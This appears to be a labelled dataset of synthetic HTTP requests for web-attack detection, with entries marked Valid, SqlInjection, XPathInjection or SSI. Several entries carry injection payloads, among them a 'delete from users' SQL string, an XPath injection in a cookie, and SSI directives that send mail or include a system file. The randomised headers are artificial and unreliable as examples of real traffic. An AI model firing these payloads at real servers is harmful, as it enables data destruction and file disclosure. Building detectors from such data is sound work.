MIME-Version: 2.7
Pragma: ite6ehh='spVn'
Proxy-Authorization: Basic Y3NuY2Rlb2o6b3lzNW0=
Authorization: Digest qop=vel7f
Range: -60328,-3384,331-
Referer: /meDplGos/imorsmb.wav
TE: chunked;q=0.2,trailers,deflate;q=0.4
Trailer: If-Range
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 0.5; al-i7; rv:7.8.0) Gecko/22556262
UA-CPU: PowerPC
UA-Disp: 366,5440,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0475x7705
Via: 2.8 www.ahoesoI.png
Transfer-Encoding: compress
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 034 234.86.11.26 "CauegTgiutt0" 
X-Forwarded-For: 76.164.228.145
X-Serial-Number: 68867877
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3782
Start - Id: 42055
class: SqlInjection
GET /thJxSatmHaogki2Cl7/0A0y/fCy7VM4o10xgmkl0Ml1k/s4ND/Eae3U5ATogefuIn6h2se/hUDhdshlfj5v0deWgHh/4lzxJ5rYk@TwP/30CbetweenTobjectetch3K6se2/69XFRX6l-GC8V18DJ.asp?oztigcKiff=%29h+r%27&aa5Snotn9=9327&ai7weststscYteo=91589&@0aZp=759818&tp=%27+++%2F**%2F+++++OR+++%2F**%2F%27%27++%3D++%27&aeodOihlear6plr=execwp-y+2lnru8QHsoia&nimsneeKOciiwtn=1&4dCel2X=491568022&rzhEmtjbh=11 HTTP/1.0
Host: 137.39.108.73
Connection: close
Accept: image/gif;q=0.8, application/postscript;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 240.50.140.120
Cookie: rgsehrtnl3EaR=375728;yhea=j vls2apshsnullNformc;tnUeN3ednErtN=be.;epiof=8Ae
Cookie2: $Version="46"
Date: Tue, 14 Jul 09 13:40:27 UTC
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sun, 21 Aug 05 19:29:33 UTC
If-Unmodified-Since: Wed, 28 Apr 04 20:37:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: ocsnt noTwatl2=rae2sMHo
Range: -256
Referer: http://www.9mthr.fr/eAe3e/n0wqdhe/ldnlme/Ud9smm/ac6e.dll
TE: gzip;q=0.2,trailers,trailers
Trailer: Range
User-Agent: N8iheiyta
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 927x5675
Via: 7ee/6.1 196.216.120.158, FTP/0.0 www.1tmhapa.html, 6.7 163.28.121.133:7083
Transfer-Encoding: tut2ei; aehnijo=uir4h
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42055
Start - Id: 48392
class: XPathInjection
GET /omaXoal/ajI0.cgi?onts=54&eh1fa3=5803897&7teh0eP1saom=tooqmdcurrio HTTP/1.1
Host: 247.186.184.184
Connection: keep-alive
Accept: video/*;q=0.5
Accept-Charset: iso-8859-6, windows-1254, us-ascii;q=0.1, x-mac-roman;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: mkxs-Ooeor, r-Ktiew;q=0.2, r2-e;q=0.9, e6n7-JaMtb9sh;q=0.0, e-ge2vei;q=0.8
Cache-Control: no-cache
Client-ip: 71.56.85.176
Cookie: ly=969320;vot=ts8mre;nobf=nre'     or  oe5cnc/rc/child::node()[processing-instruction()=864]  or  'dkr'   =';ehh9rplteR=nei@varbWNi r5hhac hexec;hmielra8aae0=2
Cookie2: $Version="7"
Date: Sat, 07 Mar 09 10:23:17 GMT
ETag: W/"KVJDdPaGzB7Hazp"
Expect: 100-continue
From: nemysAe@Nhoe.ch
If-Modified-Since: Mon, 17 Oct 05 17:12:32 GMT
If-Unmodified-Since: Wed, 01 Dec 04 14:01:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Feb 08 21:24:15 UTC
Max-Forwards: 7053
MIME-Version: 2.0
Pragma: oSTa1afy=a0o
Proxy-Authorization: Basic YWttY29hajp0b2Zh
Authorization: enE2 oeu5=0ivn
Range: 6-4347,22520-
Referer: http://www.teet.fr/ris1aS/j1oux.ace
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/0.8 (compatible; eEitee; Win 9x; qrsut0; tcHti)
UA-CPU: Sparc
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 128x9065
Via: FTP/8.8 www.arrt.htm:5, o53/9.1 84.143.77.184, HTTP/2.9 www.rloadfn.css:3
Transfer-Encoding: fvTa; zreleShd=oieSrzem
Upgrade: drca/7.4, zeot/7.9, sjnA/1.3, wIv/9.0
Warning: 216 186.83.235.10:55267 "2nxkEalywutount" 
X-Serial-Number: 631643747373
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48392
Start - Id: 31934
class: Valid
GET /4MR/ySPhokJ1execnRk.exe?nsm8fc=m0PW0dyiLjO7&NnRt=iimgpdn&eitiEadfOf=uieYe7childmat%26%2B5hs&e9nrnjomho3er=1099 HTTP/1.1
Host: www.i2ggi.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: sIc7i=adsS
Client-ip: 57.118.132.1
Cookie: eOeemh6iasj9lA=iq-61F
Cookie2: $Version="2"
Date: Sat, 27 Feb 10 12:46:58 UTC
ETag: "PyXpT62prgMAMFo"
Expect: rseO6aia=rtoc;snndhheg=satai
From: u0yrtn@eipaeu.net
If-Modified-Since: Mon, 27 Nov 06 09:17:46 GMT
If-Unmodified-Since: Tue, 06 Apr 04 24:37:51 UTC
If-Match: "T94f@nK6Q@lSbIktgK"
If-None-Match: "2gqOzrvnLFGrsdll8H"
If-Range: Mon, 05 Feb 07 05:37:35 UTC
Max-Forwards: 1119
MIME-Version: 2.3
Pragma: o='bw'
Proxy-Authorization: Digest username="nesor"
Authorization: 6nOo0 s8t6=anarttb
Range: -8,3314-2228
Referer: http://mhsw2K5k.net/tawoaiTh/NttuUt/aCfl/oddven.html
TE: trailers
Trailer: Expect
User-Agent: Mozilla/1.0 (Windows; U; Win98 8.2; g9-to; rv:6.9.6) Gecko/77999149
UA-CPU: 68000
UA-Disp: 0617,6315,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 576x144
Via: 4.9 www.hilbe.shtml
Transfer-Encoding: iftety
Upgrade: nKety0/5.6, wZTeeb/7.6
Warning: 131 www.apir.html "lnAgieyr2dmtfnwy" 
X-Forwarded-For: 159.180.214.45
X-Serial-Number: 50617070413
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31934
Start - Id: 41458
class: SqlInjection
PUT /5Ny0JkXSuoi8/7RpBhomec57v6/srU9/ckUPzk/ji2rati8nlgnNinhiruw/a4l/csCmmvfY2I/hyAtetteEoeetdtac.css? HTTP/1.0
Content-Length: 301
Content-Language: ho,bsetn,ewoNadUt
Content-Encoding: compress
Content-Location: /m5erdtSh/dkopVf2e/isherp1/tso2.jpg
Content-MD5: cWFiaG9lcjhlb090ZUVmaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 09:26:54 CET
Last-Modified: Wed, 24 May 06 13:42:20 GMT
Host: www.C7ep.uk
Connection: hsRoaa
Accept: audio/basic;q=0.7, application/postscript;q=0.4, image/png;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 165.216.117.58
Cookie: Udivx9lPEFyR=1377;2gtbaraegactl=74;d2onsd1=iesodf9aeI:~3iood;oathqe=wqTfS;dsorsaeataye2e=4
Cookie2: $Version="83"
Date: Mon, 15 Jan 07 04:55:28 GMT
ETag: W/"UtjPHEnCvSW5I-JRNNL"
Expect: i7norgb
From: utrstns@Temsn.st
If-Modified-Since: Fri, 26 Mar 10 15:00:47 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: "V5f_NPqKCaGDBLf5pB"
If-None-Match: "mzVu4hVI04QsmhYh"
If-Range: *
Max-Forwards: 40
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://i3Lro.net/tEiej/hihea.dll
TE: trailers,deflate;q=0.4,trailers
Trailer: Expect
User-Agent: hbm5etstienhcDhpsa
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: identity
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rwhc=hanLtosuswnis&apteosmw=a n&thrd=bntZEeU2&2Ka5K=o]recu&hmeHbi=fn7uLEE&UA2YEG=btgt bsl\lues(beta&4sd4=771220&r3cduhe=cnPbka9&lrlIet=ld3%uaybrtne&3J=' );  delete  from   users;     commit;  dummy(   '&opesieasv4df=usrl&lksh=9&WpnJieByQCUN=seSIQP3rC&ntLm=htacces8e&nniaReyCed=9y

End - Id: 41458
Start - Id: 23886
class: Valid
GET /oyFi/eG@L2HMs6P6unIrd7ci/teuegrtr.dll? HTTP/1.0
Host: www.iUbel8te.biz
Connection: close
Accept: application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ind-0ega;q=0.1, 7XAewgq9-zecrtcn, yj0ePs-iznwHe, ehil-se6c6wcs;q=0.5
Cache-Control: no-transform
Client-ip: 36.165.156.12
Cookie: rh6aW4rjez=1;trrTortefA6thr=fromdbodytd;os9ocp2eohnr8=47;ArOn=8096791;vinsoatos=79
Cookie2: $Version="487"
Date: Thu, 25 Jan 07 16:56:02 UTC
ETag: "NA39_MiEzIy7aaTXh"
Expect: oraRirte=73dur
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Thu, 04 Jun 09 15:26:10 GMT
If-Unmodified-Since: Sat, 03 Feb 07 06:19:47 CET
If-Match: *
If-None-Match: "l7zM66nECxpSeIcJ"
If-Range: Sat, 23 Jan 10 06:15:13 UTC
Max-Forwards: 5770
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=6roi1d
Range: 03-350626
Referer: /owxliu7h/hDila/2w9hape/faRntjoh/elsdbqom.shtml
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: e243nlehq/1.2.6
UA-CPU: 68000
UA-Disp: 734,1255,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 470x399
Via: 4.7 www.Eebcsr.png
Transfer-Encoding: compress
Upgrade: ulgz9r/5.4, a8ll/8.6, KSaees/8.7
Warning: 002 www.5girkg.js "MDcrsoovsn9ab8caPt" 
X-Forwarded-For: 87.73.118.107
X-Serial-Number: 32892404874
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23886
Start - Id: 14643
class: Valid
GET /0AWsKpASR56/aesOe/Qgit2ddtaoidtcq/moJuuHCikMSYiaaTb/PVHaHPu7.shtml? HTTP/1.1
Host: www.nicEle5tat.net
Connection: close
Accept: audio/basic;q=0.2
Accept-Charset: x-mac-arabic, x-mac-roman, cp-936;q=0.9, iso-8859-8-i, iso-8859-5
Accept-Encoding: 
Accept-Language: kcfaeseg-pnju2P;q=0.1, onguuf-tSs;q=0.8, clacasme-MthNceRe;q=0.0, aae3ephe-mhShaa1
Cache-Control: no-store
Client-ip: 128.26.226.174
Cookie: 0oirm=5588141
Cookie2: $Version="4"
Date: Wed, 26 Oct 05 16:35:33 CET
ETag: W/"faJfzJ4Nmaa_tgZtHiN5"
Expect: oaakn=Irela;tEn1
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Thu, 29 Jan 09 08:42:56 UTC
If-Unmodified-Since: Thu, 06 May 04 13:23:12 GMT
If-Match: "_UhHONFY_GhciwVa-50O"
If-None-Match: *
If-Range: Fri, 10 Jun 05 20:18:59 GMT
Max-Forwards: 77
MIME-Version: 1.8
Pragma: su8eo='didotMd'
Proxy-Authorization: Digest uri=/iakeia/rswe/dxtinpub/hbcHO/eFlahsoe.jpeg
Authorization: NTLM ZXdHZWVoYngwUXNhYWd1QWRkZXJiRWhlc3VyYWJmZWdBb3llbmdl
Range: 452-
Referer: http://ss6ri1m9.org/ieaeegt/ozTeFii/beqTnr/9errtn/tteaoia.php4
TE: trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (compatible; Konqueror/8.0; WinNT; hnat; sbe7NnceA7)
UA-CPU: x86
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 557x7129
Via: t5s/7.7 41.1.104.72
Transfer-Encoding: gzip
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 093 www.ed1gi3a.shtml:52 "snve" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 29846910
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14643
Start - Id: 24952
class: Valid
GET /ersEmIascao/aUs.r/a5c8XlibkQ58bgsoundBj/7hlmdsjrvrfvws/5Mzetc0Lc2divQNv/5MqgeyjxsRnjr/eHnMMSO/t0efliiieiEif6qte/t57GW.html?edaiplu91cenDe=hheTteeors&metawNGQcopyBV=6396544&owpet6ftm=ikh9UH0.Pd&4kleFl7g=iIte5slpmoye HTTP/1.1
Host: www.hwhytoit.org
Connection: dd5d
Accept: audio/*
Accept-Charset: x-mac-ce, x-mac-chinesetrad, x-mac-japanese, windows-1253;q=0.0, hz-gb-2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 115.80.65.226
Cookie: xmr=fNNiFujjh;0re= +
Cookie2: $Version="95"
Date: Mon, 05 Dec 05 08:00:21 GMT
ETag: W/"skTHZD605KnJf8g3j"
Expect: Oitfhn6n=epeln
From: iefmllR@anati.de
If-Modified-Since: Sun, 25 Nov 07 10:47:17 GMT
If-Unmodified-Since: Wed, 02 Nov 05 05:27:27 UTC
If-Match: *
If-None-Match: "6q7fPJucTdIQXOl@fAr"
If-Range: Thu, 22 Jul 04 20:58:34 CET
Max-Forwards: 88
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM N2hJbmNVc25lZm5hb2N5YXNzZXNzOTNIbmFuZXRlc2FvN25ldQ==
Authorization: Digest opaque="totofh"
Range: -47448,86125-296,-084
Referer: http://0ooTd.cz/l8ynyp/tebimn/a4eusvi/i4Sjh/eddhjc2a.jpg
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/4.7 (X11; U; Solaris 8.2; tm-eG; rv:4.9.3) Gecko/65486915
UA-CPU: Sparc
UA-Disp: 029,002,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: bush/5.3 www.ls93ilfs.png, 9.5 www.hisauale.tiff, FTP/2.3 143.105.78.0
Transfer-Encoding: gzip
Upgrade: 3bda/0.6, httrt3/8.5, bqt/6.9
Warning: 600 181.184.51.145:71774 "Unseeh" "Tue, 06 Apr 10 02:46:59 UTC"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24952
Start - Id: 18281
class: Valid
GET /sOC7mNt9M@6-xSa.png?7xlx2rx36fRchild=sfCO9bn1tUcw&bteaomBidGhuaoT=5Arusrw&eThlANe=107&dtanuoaiennulim=o0n&ynkti=h6ornaa4hzbla4&7asmeoetp=38951 HTTP/1.0
Host: www.ferchcnttn.fr
Connection: close
Accept: text/html;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, gzip;q=0.6, gzip, gzip, gzip
Accept-Language: yrmsuOOS-qryeHrwm, ncuePom-0pe8payi, efnrxeai-y6uhc;q=0.4, ahei-Ccld
Cache-Control: tE=2
Client-ip: 18.236.136.84
Cookie: ho=epd >Reou~t8zdi;tF.homeR=mochaoserviceswn8e>5
Cookie2: $Version="29"
Date: Sat, 12 Jun 04 18:37:17 CET
ETag: "S3.Eks2vLkJSH13lv"
Expect: er8Rh
From: tAienyay@xtgc.gov
If-Modified-Since: Wed, 18 Apr 07 03:16:41 CET
If-Unmodified-Since: Mon, 06 Feb 06 24:29:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 8.2
Pragma: pasL='ru'
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: Basic dG5oaWFpc2c6b2Flbw==
Range: -11,38-117987
Referer: http://www.hu9iruh.st/ttlrtc.cgi
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 4.1; o8-pN; rv:5.0.8) Gecko/01601361
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 364x686
Via: FTP/4.8 68.132.138.67, lco8f/3.6 5.173.111.211
Transfer-Encoding: compress
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 762 196.141.83.165 "dsswWgdregtkm" 
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 7475930929134
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18281
Start - Id: 39235
class: SSI
GET /eTr1t2essdwa1ig/brelhehtTordOoes/m2/ahE9ori/eompiod/neImOtu9at9sh/r_eQ2ShG3PvXLWkV/hnE./hjuen3rorpjhdtpcohe/hcDa/ile3oacrhtcd6ja9atu/m8RRiISGXAtz6P.zC.tiff?ttt=95&ajrlon=%3C%21--%23email+fromhost%3D%22www.ectgtYi.com%22+tohost%3D%22mailbox.onej.com%22+message%3D%22idiSr+rsudqh+uc+fpgm%22+fromaddress%3D%22tuhsl.com%22+toaddress%3D%22fqwt.n8On.com%22+subject%3D%22sh%22+sender%3D%22enhn.com%22+replyto%3D%22ie2esl.com%22+cc%3D%22dj%22+inreplyto%3D%22r7+isIN+Rs9aw%22+id%3D%22somail%22+--%3E&Ahwmothwh=edooxmctenelr9u&PLLlikeNlT=nrj&Tuwbetd=re&eCns=hDttod&mFJ1DHrcpQeH=1&ti9=90459&zodadmintls=el+oeTds%5Ci7n%3E%3CtmplF%3E&i3its3re=sRwb HTTP/1.1
Host: www.baTlc.org
Connection: close
Accept: */*
Accept-Charset: windows-1255, iso-8859-6, us-ascii;q=0.9, iso-8859-15;q=0.4
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 115.187.210.122
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="350"
Date: Fri, 08 Jan 10 19:57:10 GMT
ETag: "4WITdI0tQXVWOMUbkat"
Expect: 7a2s1
From: lyrtrai@3atnetodh4.net
If-Modified-Since: Sat, 30 Oct 04 24:45:54 GMT
If-Unmodified-Since: Tue, 05 Jun 07 14:37:29 GMT
If-Match: *
If-None-Match: "IsF@d7xVrrxYbKnrR.S7"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 20
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: tnehsR oeivpo=oehots
Range: 5-9725,-6683
Referer: /tnNIxii/ybenpCm/enoeatnh/uwnE9mx.tiff
TE: chunked;q=0.6,trailers,trailers
Trailer: Date
User-Agent: eesemy7at (o0DCl.Hod; wSQBPVdNn; lp@7vDClI; j.LMvywc1Z; hR2vf_TJg)
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: 9.6 35.62.81.245
Transfer-Encoding: compress
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 173 103.13.38.123 "ncwbefh" "Tue, 25 Oct 05 02:27:19 UTC"
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 157624
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39235
Start - Id: 25809
class: Valid
GET /JGjYRPeF5DS/thCdl.msf?rirhyy=w&g5edarhqaEetkc=666709580&rr=zcs.jSqTo&izsU7r5ast6rte=l32&5eyWcIdo=0rUmss&oep=60370942&tlrs=oo&sthAK=7srtvedNmi1&YIlikevn4Qy4YwS=e&h9ttt0etsg=nSOdVjEbkFtO&Hvbscript.46=1903363&wqtteen1eMrcdt=hSPsqwReeekh HTTP/1.1
Host: 249.99.149.116:80
Connection: 5nf5n
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate, identity, identity, identity
Accept-Language: *;q=0.5
Cache-Control: min-fresh=9
Client-ip: 39.24.186.85
Cookie: x@zAy=8834922;iuExon=3454;ce3tjH=4rnme;emseusomita=uop;pYi_Q3p=eeougrsn<
Cookie2: $Version="8"
Date: Mon, 14 Mar 05 08:52:43 UTC
ETag: W/"5KAobwbWehhET_36a16V"
Expect: hilldtgm=yhYaRiZ
From: rEiy@reqTe7sdhm.cz
If-Modified-Since: Mon, 09 Feb 04 03:09:17 GMT
If-Unmodified-Since: Sun, 30 Sep 07 16:51:47 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Jan 07 04:07:46 GMT
Max-Forwards: 76
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic aG8zYXJPYjplaHV4bw==
Authorization: NTLM c2VvTXN1d3Q5Zm5vdGF0YnRkdHRwYTd0akx0Z29jbnI0YQ==
Range: 644-,-02
Referer: http://www.2noE.fr/ecogodl/hLtEniaa/maqjv/y3eh/nOderzr.php3
TE: gzip;q=0.7,trailers
Trailer: Range
User-Agent: Mozilla/5.5 (X11; U; Open BSD i586 8.5; qs-ai; rv:5.5.2) Gecko/12194297
UA-CPU: PowerPC
UA-Disp: 7806,6470,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: 4.4 168.255.101.223
Transfer-Encoding: gzip
Upgrade: wga/3.1, Wienee/8.7, tle/0.5, sc5O3p/8.0, atnnea/5.9
Warning: 886 145.152.248.154 "h6n7sqlaahdlAhre0" 
X-Forwarded-For: 186.228.205.221
X-Serial-Number: 5771791492061
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25809
Start - Id: 20909
class: Valid
GET /eunZ1i91KST96Wz/rOkQRbB6XMBZHt9f/lfm0P/uyDeYVZxe5PeB/v.3JELzk/0dlbeS/H9p/tKWuhSevH%u@/zoi.php?eyjutitdeons=72&oeswRreizi=%3Ayh45t+uniti7s2&tq=S&uiea3eryogddsu=%5D%3Fd&irEerNsoeaq=9io HTTP/1.1
Host: 155.173.155.23
Connection: 6gnndSir
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 47.98.27.45
Cookie: nna=la;aahhnoarag24s=31970;heJweusntyeynh=5958897620;IEkMnullP3Kt=e6rdrpj0a;eiesTitn=244317901;tneee2Ikieae5=eLehnres8afirai
Cookie2: $Version="53"
Date: Fri, 30 Dec 05 07:03:27 CET
ETag: W/"UCpraVfCtd0pS96L4"
Expect: e3nio=aeanEo;1io5iao=h9l6O
From: r60s@oeoenEi.biz
If-Modified-Since: Thu, 12 May 05 04:29:34 GMT
If-Unmodified-Since: Mon, 05 Jun 06 08:46:51 UTC
If-Match: *
If-None-Match: *
If-Range: "5yVSDgERmidiecPWHmzD"
Max-Forwards: 792
MIME-Version: 6.8
Pragma: nh=o3q
Proxy-Authorization: 5lee isw1q=euaaW
Authorization: Basic aHM3c0xzbzpydHRh
Range: 156002-027392,-346
Referer: http://reoes.it/7pp6m/nEae/nPhNnec/mnnodop/Orhmfwb.asp
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 0.5; he-ei; rv:2.1.6) Gecko/74418446
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4129x627
Via: vqt/6.0 www.usgo.shtml
Transfer-Encoding: gzip
Upgrade: neaxe/1.5
Warning: 431 85.173.16.1 "r5mststaned9nnteeeoM" "Sun, 21 Jan 07 21:50:10 GMT"
X-Forwarded-For: 186.72.20.98
X-Serial-Number: 8671982338196
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20909
Start - Id: 32192
class: Valid
GET /Ss7ne6varI@/xUwHlUHOfr.Y.asmx?nT0ldoueahe=+&tehyg6e=0Lt6ayetou&DaAetioSdS=9E7 HTTP/1.1
Host: 217.84.255.253:7166
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, euc-tw;q=0.5, euc-kr
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 40.17.58.230
Cookie: iwe=rhsaolruEaers;oml=ro0window.open;obue=50;na=utedFi
Cookie2: $Version="095"
Date: Fri, 09 Jun 06 18:55:34 UTC
ETag: "2pWs8hrAWmRsG05H"
Expect: Rarwce=ztdSeore;sbpvwtEE=0xmcltO
From: snwytmee@dIalAsNl.cz
If-Modified-Since: Thu, 01 Apr 10 08:13:10 CET
If-Unmodified-Since: Mon, 15 Feb 10 24:48:53 UTC
If-Match: *
If-None-Match: "veiP8TFZT8rA5n7po"
If-Range: Thu, 13 Jul 06 04:46:15 CET
Max-Forwards: 0
MIME-Version: 1.9
Pragma: 4d8=r
Proxy-Authorization: werm rnqahTl=Rnzd2
Authorization: NTLM dGhjamxFYWdoZ3NBZW51cmVLeWVyZWN1bjF5NlRhbGFlcw==
Range: -31011,02795-
Referer: /scsvoTe0/nmvnin/tak93mm/oemPei.mspx
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 6.7; so-bx; rv:4.5.9) Gecko/11929751
UA-CPU: Sparc
UA-Disp: 8263,026,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9868x2835
Via: 1.7 190.210.67.31, 1.8 54.133.30.38, HTTP/6.7 www.e7v9ne2.gif
Transfer-Encoding: deflate
Upgrade: coa/8.9, bs5zt/4.7, otwod/4.4, nRrcae/8.7
Warning: 807 86.138.171.101:76709 "oswel2" "Mon, 10 Sep 07 10:52:59 CET"
X-Forwarded-For: 54.1.46.142
X-Serial-Number: 76488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 32192
Start - Id: 40492
class: SSI
GET /opnthp1tcah/5nofm/rwcEQr7/eanilna9n/rNGUhPo-WSQ/ejtlievjreedpisoa/4gdtseeuuusars9ir.jpeg?V8zRQPc21U=is&De44acah4p7s=r7%3Esock_stream%27&3eteniwdbt=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&tiasfvnagbHpu=r6rold6aothntry&iNQYryA=qeSes1sttaDir HTTP/1.1
Host: 63.33.105.171
Connection: close
Accept: image/gif, audio/*, image/*;q=0.9
Accept-Charset: windows-1258, euc-kr;q=0.8
Accept-Encoding: identity;q=0.8, compress, compress, gzip;q=0.9, identity;q=0.3
Accept-Language: hrshwo-l;q=0.1, eEotiri-iceee
Cache-Control: e7reAed=V
Client-ip: 191.31.19.42
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="05"
Date: Fri, 27 Oct 06 07:21:11 GMT
ETag: W/"2I2TG1yCP5g9eFfUR"
Expect: 100-continue
From: 8low4er1@ewrsnfl.uk
If-Modified-Since: Tue, 10 Feb 09 13:41:25 UTC
If-Unmodified-Since: Mon, 15 Nov 04 24:05:53 UTC
If-Match: *
If-None-Match: "7SRj@1k@zeufaX..4_"
If-Range: "5pFRSbUL4q6nmWe"
Max-Forwards: 44
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: Basic bHpMZWFlOnR3YXE=
Range: 74842-61,9795-78
Referer: /oaolhsoe/iaoe/ta2nhpeR/yeeDop1.wav
TE: trailers
Trailer: Warning
User-Agent: 524q_7J http://www.wekotoj.de
UA-CPU: StrongARM
UA-Disp: 609,4490,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: 1.5 www.Meocznt.png, FTP/3.8 www.gluwgrzt.jpeg:1, 5.2 249.114.151.213
Transfer-Encoding: 01nt
Upgrade: eiHn/0.0, mn7n9/4.3, Nko/4.4, wda/1.3, 7itb/8.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 253677
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40492
Start - Id: 221
class: Valid
